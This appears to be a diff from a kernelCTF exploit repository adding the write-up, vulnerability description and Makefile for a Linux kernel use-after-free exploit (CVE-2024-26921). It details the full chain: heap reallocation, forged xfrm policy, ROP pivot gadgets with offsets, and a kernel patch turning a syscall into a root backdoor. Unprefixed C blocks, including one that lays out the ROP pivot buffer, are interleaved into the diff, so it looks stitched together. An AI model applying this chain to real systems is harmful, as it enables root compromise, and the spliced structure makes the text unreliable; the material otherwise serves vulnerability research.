google · lambdasprocket · Dec 21, 2025 · artmetla · Mar 11, 2026 · artmetla
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/exploit.md
@@ -0,0 +1,176 @@
+## Overview
+
+To exploit this Use-After-Free, we must trigger the bug and overwrite the freed memory entirely within the synchronous execution path of ip_local_out(). The high-level strategy is:
+1. Send a locally generated, fragmented IP packet so ip_send_skb() pushes its sk_buff (skb) into the netfilter hooks via ip_local_out().
+2. Have ip_defrag() process the skb, dropping the final reference to its associated socket (skb->sk) and freeing the socket's memory.
+3. Use a subsequent netfilter hook to immediately allocate over the freed skb->sk memory with our controlled payload.
+4. Let a later netfilter hook dereference the forged skb->sk object to gain execution control.
+
+Let's look at what we need to perform the attack.
+
+### Socket to send the packet through
+
+Different socket families have different handling of the routing and fragmentation issues.
+We do not want to use upper layer protocols like TCP or UDP, because they perform their own fragmentation and we need to trigger fragmentation at the IP layer.
+
+The second thing to consider is the slab cache used to allocate struct sock. Most socket families have a dedicated cache, but some use regular kmalloc(), giving us a simple way to reallocate the freed object without performing a cross-cache attack.
+
+And finally, some sockets use a SOCK_RCU_FREE flag which causes sk_destruct() to wait for an RCU grace period before freeing the sock object. Because the vulnerable "use" happens synchronously later in the exact same netfilter pipeline, an RCU delay means the memory wouldn't actually be returned to the allocator until after the kernel dereferences the dangling pointer. This would make exploitation much harder, as we would need to artificially stall the packet's execution to wait for the grace period.
+
+The socket family that fulfills all those requirements is AF_PACKET (used for sending raw packets at layer 2).
+
+This means we need to set our own layer 2 and layer 3 headers and choose an output device for the packet.
+No routing is done; the packet goes straight to the output queue of the selected device.
+
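As a minimal sketch of what "setting our own layer 2 and layer 3 headers" involves, the following user-space helper writes an Ethernet header followed by an option-less IPv4 header into a buffer. The function names, the TTL of 64 and the MAC/IP values used with it are illustrative assumptions, not taken from the exploit source.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { ETH_HDR_LEN = 14, IP_HDR_LEN = 20 };

/* Internet checksum (RFC 1071) over an even number of bytes. */
uint16_t ip_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;

    for (size_t i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put_be16(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v >> 8);
    p[1] = (uint8_t)(v & 0xff);
}

static void put_be32(uint8_t *p, uint32_t v)
{
    put_be16(p, (uint16_t)(v >> 16));
    put_be16(p + 2, (uint16_t)(v & 0xffff));
}

/*
 * Hypothetical helper: fill in a 14-byte Ethernet header and a 20-byte
 * IPv4 header (no options). Addresses are given in host byte order.
 * Returns the number of header bytes written.
 */
size_t build_headers(uint8_t *frame,
                     const uint8_t dst_mac[6], const uint8_t src_mac[6],
                     uint32_t saddr, uint32_t daddr,
                     uint8_t proto, uint16_t payload_len)
{
    uint8_t *ip = frame + ETH_HDR_LEN;

    memcpy(frame, dst_mac, 6);
    memcpy(frame + 6, src_mac, 6);
    put_be16(frame + 12, 0x0800);            /* EtherType: IPv4 */

    memset(ip, 0, IP_HDR_LEN);
    ip[0] = 0x45;                            /* version 4, IHL 5 */
    put_be16(ip + 2, (uint16_t)(IP_HDR_LEN + payload_len));
    ip[8] = 64;                              /* TTL (assumed value) */
    ip[9] = proto;
    put_be32(ip + 12, saddr);
    put_be32(ip + 16, daddr);
    put_be16(ip + 10, ip_checksum(ip, IP_HDR_LEN));
    return ETH_HDR_LEN + IP_HDR_LEN;
}
```

The payload would follow at `frame + 34`. Recomputing `ip_checksum()` over the finished IPv4 header yields 0, which is a convenient sanity check.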
+### Device driver to call ip_local_out()
+
+Because `AF_PACKET` injects frames directly at Layer 2 (skipping the Layer 3 IP output stack entirely), functions like `ip_send_skb()` are bypassed. If sent through a standard interface, our packet would never hit the netfilter hooks. We need an alternative way to force the kernel to pass our crafted `skb` into `ip_local_out()`.
+
+The IPvlan driver provides exactly such a path. When processing outbound IPv4 traffic, the driver sets up the route itself and directly invokes `ip_local_out()`:
+```
+static int ipvlan_process_v4_outbound(struct sk_buff *skb)
+{
+...
+        skb_dst_set(skb, &rt->dst);
+
+        memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
+
+        err = ip_local_out(net, skb->sk, skb);
+...
+```
+
+So our packets will be sent out of the IPvlan interface.
+IPvlan needs a master ethernet device and we used the veth interface for that.
+
+
+### A way to close the socket fd before the ip_defrag() call
+
+When our `skb` reaches `ip_defrag()`, the function drops a reference to the socket (`skb->sk`). However, the socket memory is only freed if this drops the reference count (`sk_refcnt`) to zero. If the user-space file descriptor (fd) is still open, it holds an active reference, preventing the allocation from being freed.
+We can call close() only after sendmsg() returns. The syscall returns after the packet is enqueued to the output device, so we could try to win a race and close the fd in time, but there is a simpler way.
+
+To achieve deterministic execution, we use the `sch_plug` queuing discipline. `sch_plug` can be attached to a network device to pause its egress queue, holding outbound packets until an explicit "unplug" command is received via the Netlink API. This allows us to cleanly suspend the packet's journey right before it enters the vulnerable `ip_local_out()` path.
+
+So the steps of our exploit are:
+1. "plug" the ipvlan interface
+2. Send a packet
+3. Close the socket
+4. "unplug" the ipvlan interface
+
+These are actually all the steps needed to exploit the vulnerability, if we exclude the setup needed beforehand.
+
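The effect of the four steps on the socket reference count can be illustrated with a small user-space model. This is only a sketch: the `model_*` names are hypothetical, the socket is reduced to a counter, and the whole netfilter pipeline is collapsed into a single "transmit" step in which `ip_defrag()` drops the skb's reference.

```c
#include <stdbool.h>

struct model_sock {
    int  refcnt;        /* stands in for sk_refcnt */
    bool freed;
};

struct model_dev {
    bool plugged;       /* sch_plug is holding the queue */
    bool skb_queued;    /* our packet is waiting in the qdisc */
    bool uaf_window;    /* sock was freed while later hooks still had to run */
};

void model_sock_put(struct model_sock *sk)
{
    if (--sk->refcnt == 0)
        sk->freed = true;
}

/* The packet leaves the queue; ip_defrag() drops the skb's reference. */
void model_transmit(struct model_dev *dev, struct model_sock *sk)
{
    dev->skb_queued = false;
    model_sock_put(sk);
    dev->uaf_window = sk->freed;
}

void model_send(struct model_dev *dev, struct model_sock *sk)
{
    sk->refcnt++;                   /* the skb pins its socket */
    dev->skb_queued = true;
    if (!dev->plugged)
        model_transmit(dev, sk);    /* nothing holds the packet back */
}

void model_close(struct model_sock *sk)
{
    model_sock_put(sk);             /* the fd's reference goes away */
}

void model_unplug(struct model_dev *dev, struct model_sock *sk)
{
    dev->plugged = false;
    if (dev->skb_queued)
        model_transmit(dev, sk);
}

/* Run plug (optional), send, close, unplug; report whether the sock was
 * freed in the middle of packet processing. */
bool model_run(bool use_plug)
{
    struct model_sock sk = { .refcnt = 1, .freed = false };  /* fd reference */
    struct model_dev dev = { .plugged = use_plug };

    model_send(&dev, &sk);
    model_close(&sk);
    model_unplug(&dev, &sk);
    return dev.uaf_window;
}
```

In this model `model_run(true)` reports the use-after-free window, because the skb holds the last reference when the queue is released. `model_run(false)` does not, because the fd still pins the socket while the packet is processed.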
+### Network tools
+
+The exploit needs external iptables and ip (from iproute2 package) binaries to set up rules and network interfaces. 
+These tools are not available in the current kernelCTF root image, so the tar archive with binaries and supporting libraries is attached to the exploit binary as a custom ELF section and extracted using objcopy during execution.
+
+## Triggering the IPv4 fragmentation
+
+The most straightforward way to force fragmentation would be to set a small Maximum Transmission Unit (MTU) on our initial outgoing interface (ipv1). However, if we attempt to send a packet larger than that interface's MTU, the `sendmsg()` syscall checks the length against the device MTU synchronously and immediately returns an `EMSGSIZE` ("Message too long") error. The packet is dropped before it ever reaches the Netfilter hooks.
+Instead, we must reroute our packet to another interface with a low MTU (ipv0). This is done using a DNAT rule.
+
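To make the effect of the low MTU concrete, here is a hedged sketch of how an IPv4 payload is split once it has to leave through a smaller interface. It assumes a 20-byte header without options and follows the usual rule that every fragment except the last carries a multiple of 8 payload bytes. The struct and function names are hypothetical, and the MTU in the usage note is an example value, not the one the exploit configures.

```c
#include <stddef.h>
#include <stdint.h>

struct frag_plan {
    uint16_t offset;          /* byte offset of this fragment's payload */
    uint16_t len;             /* payload bytes carried by this fragment */
    int      more_fragments;  /* value of the MF flag */
};

/*
 * Split payload_len bytes of IP payload for the given MTU.
 * Returns the number of fragments written to out, or -1 if the MTU is
 * too small or out has fewer than the required entries.
 */
int plan_fragments(size_t payload_len, size_t mtu,
                   struct frag_plan *out, size_t max)
{
    size_t per_frag, off = 0;
    int n = 0;

    if (mtu < 20 + 8)
        return -1;
    per_frag = (mtu - 20) & ~(size_t)7;   /* round down to 8-byte units */

    while (off < payload_len) {
        size_t len = payload_len - off;

        if (len > per_frag)
            len = per_frag;
        if ((size_t)n == max)
            return -1;
        out[n].offset = (uint16_t)off;
        out[n].len = (uint16_t)len;
        out[n].more_fragments = (off + len < payload_len);
        off += len;
        n++;
    }
    return n;
}
```

For example, a 1200-byte payload and an MTU of 576 give three fragments of 552, 552 and 96 payload bytes, with MF cleared only on the last one.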
+## Triggering ip_defrag()
+
+When we configured the `DNAT` rule in the previous step to force routing, the kernel automatically enabled the `conntrack` module to manage the NAT translations. Because `conntrack` relies on transport-layer headers (which are only present in the first fragment) to track connection states, it cannot process fragmented packets. 
+
+To resolve this, Netfilter automatically registers the `ipv4_conntrack_defrag` hook to intercept and reassemble IP fragments *before* they reach the NAT or `conntrack` hooks. 
+
+Therefore, as our dynamically fragmented packets traverse the `OUTPUT` chain, they are caught by this defrag hook. The hook calls `ip_defrag()` to process each fragment. When the final fragment is processed, `ip_defrag()` erroneously drops the final reference to the originating socket (`skb->sk`), freeing the socket object directly into the `kmalloc` cache while the packet continues down the Netfilter pipeline.
+
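The defrag hook only hands a packet to `ip_defrag()` when the IPv4 header marks it as a fragment. The sketch below models that test in user space on a host-order `frag_off` value. The `MODEL_*` constants and function names are hypothetical stand-ins chosen for this example.

```c
#include <stdbool.h>
#include <stdint.h>

#define MODEL_IP_MF     0x2000u   /* "more fragments" flag */
#define MODEL_IP_OFFSET 0x1fffu   /* fragment offset, in 8-byte units */

/* True if the header belongs to a fragment: MF set or a non-zero offset. */
bool model_is_fragment(uint16_t frag_off)
{
    return (frag_off & (MODEL_IP_MF | MODEL_IP_OFFSET)) != 0;
}

/* Build a host-order frag_off value from a byte offset and the MF flag. */
uint16_t model_frag_off(uint16_t byte_offset, bool more_fragments)
{
    return (uint16_t)((byte_offset / 8) | (more_fragments ? MODEL_IP_MF : 0));
}
```

An unfragmented packet (`frag_off == 0`, or only the DF bit `0x4000` set) is not treated as a fragment. The first fragment (offset 0, MF set) and the last one (non-zero offset, MF clear) both are.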
+## Reallocating the victim object
+
+To replace the victim object, all we have to do is allocate from the kmalloc-2k cache on the same CPU.
+This must happen before all the hooks finish, so there is no way to make the allocation from user space.
+However, we can use whatever netfilter modules we want. There are a lot of them, and some are bound to make new allocations.
+This line of thinking leads us to the TEE target:
+> The TEE target will clone a packet and redirect this clone to another machine on the local network segment.
+
+Cloning a packet sounds great, as it involves copying the data we passed to the send() function.
+There is a problem, though. Our packet's data needs to be larger than 1024 bytes to be allocated from kmalloc-2k, and an skb stores packets that large using a fragment list. When TEE clones the skb, pskb_copy() is called and only the space for the head is allocated with regular kmalloc; the rest is zero-copied by cloning the fraglist.
+
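The size threshold can be sanity-checked with a simplified model of the general-purpose kmalloc size classes. The list of classes below is the common x86-64 layout and is an assumption about the target configuration. The sketch also ignores the bookkeeping the kernel adds to an skb data buffer, so it only illustrates the rounding, not the exact request size.

```c
#include <stddef.h>

/*
 * Hypothetical model: return the size class that would serve a request
 * of the given size, or 0 if it is larger than the classes listed here.
 */
size_t model_kmalloc_bucket(size_t size)
{
    static const size_t buckets[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i < sizeof(buckets) / sizeof(buckets[0]); i++) {
        if (size <= buckets[i])
            return buckets[i];
    }
    return 0;
}
```

A request of exactly 1024 bytes stays in the 1024-byte class, while anything from 1025 to 2048 bytes lands in the 2048-byte class, the same one the victim object is allocated from.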
+Fortunately, some netfilter modules need to look at the whole packet data in one piece (e.g. to search for patterns) instead of dealing with skb fragments.
+
+One such example is the conntrack SIP helper. Because SIP is a text-based protocol, the helper must search the packet payload for specific string patterns, which it cannot do safely across fragmented memory pages. Instead, it calls `skb_linearize()`, which transforms a fragmented skb into a linear one by allocating a buffer for all the data with kmalloc and copying the data there. This finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data.
+
+To summarize, by combining the TEE target and the SIP conntrack helper, we are able to overwrite the victim sock object that will be used by the netfilter hooks.
+
+## Getting RIP control
+
+Controlling the struct sock object may seem like an instant win at first, but we soon discover that netfilter hooks rarely use the socket context and never call function pointers from that object.
+
+The solution is the ip_route_me_harder() function which is called in the mangle table if some IPv4 parameters like src/dst address, TOS or mark change after mangle rules are executed:
+
+```
+static unsigned int
+ipt_mangle_out(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
+{       
+...
+        /* Save things which could affect route */
+        mark = skb->mark;
+        iph = ip_hdr(skb);
+        saddr = iph->saddr;              
+        daddr = iph->daddr;
+        tos = iph->tos;
+
+        ret = ipt_do_table(priv, skb, state);
+        /* Reroute for ANY change. */
+        if (ret != NF_DROP && ret != NF_STOLEN) {
+                iph = ip_hdr(skb);
+
+                if (iph->saddr != saddr ||
+                    iph->daddr != daddr ||
+                    skb->mark != mark ||
+                    iph->tos != tos) {
+                        err = ip_route_me_harder(state->net, state->sk, skb, RTN_UNSPEC);
+...
+```
+
+state->sk here is the pointer to our sock object.
+
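The reroute condition in ipt_mangle_out() boils down to comparing four saved values with their state after the mangle rules ran. A minimal user-space model follows, with a hypothetical struct and function name. Changing only the mark, as in the usage note, is one assumed way to satisfy the condition.

```c
#include <stdbool.h>
#include <stdint.h>

/* The packet properties that ipt_mangle_out() saves before running the rules. */
struct model_route_key {
    uint32_t saddr;
    uint32_t daddr;
    uint32_t mark;
    uint8_t  tos;
};

/* True if any saved property changed, i.e. ip_route_me_harder() would run. */
bool model_needs_reroute(const struct model_route_key *before,
                         const struct model_route_key *after)
{
    return before->saddr != after->saddr ||
           before->daddr != after->daddr ||
           before->mark  != after->mark  ||
           before->tos   != after->tos;
}
```

If a mangle rule changes only the mark, the predicate is already true, so `ip_route_me_harder()` is reached with the dangling `state->sk`.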
+ip_route_me_harder() calls xfrm_lookup(), which examines sk->sk_policy and, if the policy matches the current connection, eventually calls dst_alloc().
+dst_alloc() calls the gc function pointer of the netns_xfrm.dst_ops struct, and the netns_xfrm comes from the xfrm policy, which is under our control.
+
+So if we are able to craft a valid struct xfrm_policy that matches our connection, we will be able to get RIP control.
+
+This policy is prepared in prepare_policy().
+The fake object for the sock itself is simple - we just need to set the sk_policy pointer and sk_mark value.
+
+The policy object takes a lot of space and has pointers to other objects like netns_xfrm, so we used the [direct mapping storage technique](../../CVE-2024-26923_lts_cos/docs/novel-techniques.md) to place it at a known address in the kernel address space.
+
+## Pivot to ROP
+
+When the gc pointer is called in dst_alloc(), the RDI register contains a pointer to dst_ops, which is part of our fake netns_xfrm object.
+
+The following gadgets were used to pivot to the ROP chain placed at dst_ops + 0x10 (our gc pointer is at dst_ops + 0x08).
+
+```
+mov    r8,QWORD PTR [rdi+0xc8]
+mov    eax,0x1
+test   r8,r8
+je     ffffffff82185d21
+mov    rsi,rdi
+mov    rcx,r14
+mov    rdi,rbp
+mov    rdx,r15
+call ffffffff82427a60 <__x86_indirect_thunk_r8>
+```
+
+This copies RDI to RSI and then calls the next gadget through R8, which was loaded from [rdi + 0xc8]:
+
+```
+push rsi
+jmp qword ptr [rsi + 0x39]
+```
+
+and finally
+
+```
+pop rsp
+pop rbp
+pop rbx
+ret
+```
+
+## Second pivot
+
+To get more room for our ROP chain we move to a second location in the direct mapping using a simple pop rsp ; ret gadget.
+
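The offsets used by the three gadgets can be summarized as a buffer layout. The sketch below is one reading of the gadget listing, not the exploit's actual code: the first gadget is reached through the gc slot at +0x08, the second through the pointer at +0xc8, and the third through the pointer at +0x39. After `pop rsp` the two extra pops consume +0x00 and +0x08, so `ret` continues at +0x10. All names are hypothetical and the gadget addresses are placeholders supplied by the caller.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum {
    OFF_GC        = 0x08,   /* dst_ops.gc: first gadget */
    OFF_ROP       = 0x10,   /* first-stage ROP chain starts here */
    OFF_JMP_SLOT  = 0x39,   /* target of "jmp qword ptr [rsi + 0x39]" */
    OFF_CALL_SLOT = 0xc8,   /* loaded into r8 by the first gadget */
    FAKE_OPS_SIZE = 0xd0
};

static void put64(uint8_t *buf, size_t off, uint64_t v)
{
    memcpy(buf + off, &v, sizeof(v));   /* offsets may be unaligned */
}

/* Number of 8-byte chain entries that fit before the slot at +0x39. */
size_t first_stage_slots(void)
{
    return (OFF_JMP_SLOT - OFF_ROP) / sizeof(uint64_t);
}

/*
 * Fill a FAKE_OPS_SIZE-byte buffer with the three gadget pointers and a
 * short first-stage chain. Returns 0 on success, -1 if the chain would
 * overlap the pointer stored at +0x39.
 */
int layout_fake_dst_ops(uint8_t *buf,
                        uint64_t gadget_call_r8,
                        uint64_t gadget_push_rsi_jmp,
                        uint64_t gadget_pop_rsp,
                        const uint64_t *chain, size_t n)
{
    if (n > first_stage_slots())
        return -1;

    memset(buf, 0, FAKE_OPS_SIZE);
    put64(buf, OFF_GC, gadget_call_r8);
    put64(buf, OFF_CALL_SLOT, gadget_push_rsi_jmp);
    put64(buf, OFF_JMP_SLOT, gadget_pop_rsp);
    for (size_t i = 0; i < n; i++)
        put64(buf, OFF_ROP + i * sizeof(uint64_t), chain[i]);
    return 0;
}
```

Only five 8-byte entries fit between +0x10 and the pointer at +0x39, which is consistent with the need for a second pivot: a two-entry first-stage chain (the address of a `pop rsp ; ret` gadget followed by the address of the larger chain) is enough to move on.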
+## Privilege escalation
+
+Our ROP is executed from the ksoftirqd context, so we can't do a traditional commit_creds() to modify the current process's privileges.
+
+We could try locating our exploit process and changing its privileges, but we decided to go with a different approach - we patch the kernel, creating a backdoor that grants root privileges to any process that executes a given syscall.
+
+We chose the rarely used kexec_file_load() syscall and overwrote its code with our get_root function, which performs the traditional privilege escalation and namespace escape steps: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy) etc.
+
+This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised.
+
+Patching the kernel function is done in rop_patch_kernel_code() - it calls set_memory_rw() on the destination memory and uses copy_user_generic() to write the new code there.
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/vulnerability.md
@@ -0,0 +1,65 @@
+## Requirements to trigger the vulnerability
+
+- CAP_NET_ADMIN in a namespace is required
+- Kernel configuration: CONFIG_INET
+- User namespaces required: Yes
+
+## Commit which introduced the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7026b1ddb6b8d4e6ee33dc2bd06c0ca8746fa7ab
+
+## Commit which fixed the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=18685451fc4e546fc0e718580d32df3c0e5c8272
+
+## Affected kernel versions
+
+Introduced in 4.1. Fixed in 6.6.25, 5.10.226 and other stable trees.
+
+## Affected component, subsystem
+
+net/ipv4
+
+## Description
+
+ip_local_out() is the function responsible for sending locally generated IPv4 packets.
+It calls the NF_INET_LOCAL_OUT netfilter hooks and eventually dst_output().
+
+The usual call to ip_local_out() looks like this:
+```
+int ip_send_skb(struct net *net, struct sk_buff *skb)
+{
+        int err;
+
+        err = ip_local_out(net, skb->sk, skb);
+        if (err) {
+                if (err > 0)
+                        err = net_xmit_errno(err);
+                if (err)
+                        IP_INC_STATS(net, IPSTATS_MIB_OUTDISCARDS);
+        }
+
+        return err;
+}
+```
+
+Pointer to the socket associated with the skb is passed as an argument to ip_local_out() and then to all the netfilter hooks:
+
+```
+int __ip_local_out(struct net *net, struct sock *sk, struct sk_buff *skb)
+{
+...
+        return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT,
+                       net, sk, skb, NULL, skb_dst(skb)->dev,
+                       dst_output);
+
+}
+```
+
+skb holds a reference to a socket. Under normal conditions, the skb is released only after its output path has finished, or after it has been received by the upper layers of the input stack (when the outgoing packet is routed back to a local interface).
+This ensures the associated socket is valid while the netfilter hooks are executing.
+
+ip_defrag() is most often called in the input path, and it calls skb_orphan()/kfree_skb() on the fragment skb, assuming it is no longer needed.
+However, ip_defrag() can also be called in the output path by the netfilter conntrack hook ipv4_conntrack_defrag().
+
+If that happens, the skb is released, and if it held the last reference to the socket, the socket is released as well, causing a use-after-free when the subsequent hooks are called and in ip_finish_output().
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/Makefile b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/Makefile
@@ -0,0 +1,10 @@
+INCLUDES = -I/usr/include/libnl3
+LIBS = -L. -pthread -lnl-cli-3 -lnl-route-3 -lnl-3 -ldl
+CFLAGS = -fomit-frame-pointer -static -fcf-protection=none
+
+exploit: exploit.c kernelver_16919.450.26.h
+	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)
+	objcopy --add-section tools=tools.tar.gz $@
+
+prerequisites:
+	sudo apt-get install libnl-cli-3-dev libnl-route-3-dev
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/exploit b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/exploit